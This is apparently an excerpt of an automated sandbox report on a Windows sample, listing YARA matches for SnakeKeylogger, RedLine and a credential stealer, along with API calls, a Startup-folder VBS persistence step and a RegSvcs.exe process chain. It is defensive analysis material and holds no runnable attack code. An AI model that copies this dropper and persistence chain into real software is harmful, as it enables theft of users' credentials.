                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.nonplacental.exe.3b30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine | snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103A06A GetLastError,FormatMessageW,0_2_0103A06A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010281CB AdjustTokenPrivileges,CloseHandle,0_2_010281CB
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_010287E1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006481CB AdjustTokenPrivileges,CloseHandle,2_2_006481CB
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_006487E1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0103B333
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0104EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0104EE0D
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0103C397
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FD4E89
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\juvenileJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\Temp\autCACC.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
                  Source: ref_97024130865.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ref_97024130865.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile read: C:\Users\user\Desktop\ref_97024130865.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\ref_97024130865.exe "C:\Users\user\Desktop\ref_97024130865.exe"
Source: C:\Users\user\Desktop\ref_97024130865.exe | Process created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\Desktop\ref_97024130865.exe"
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ref_97024130865.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ref_97024130865.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Section loaded: wininet.dll
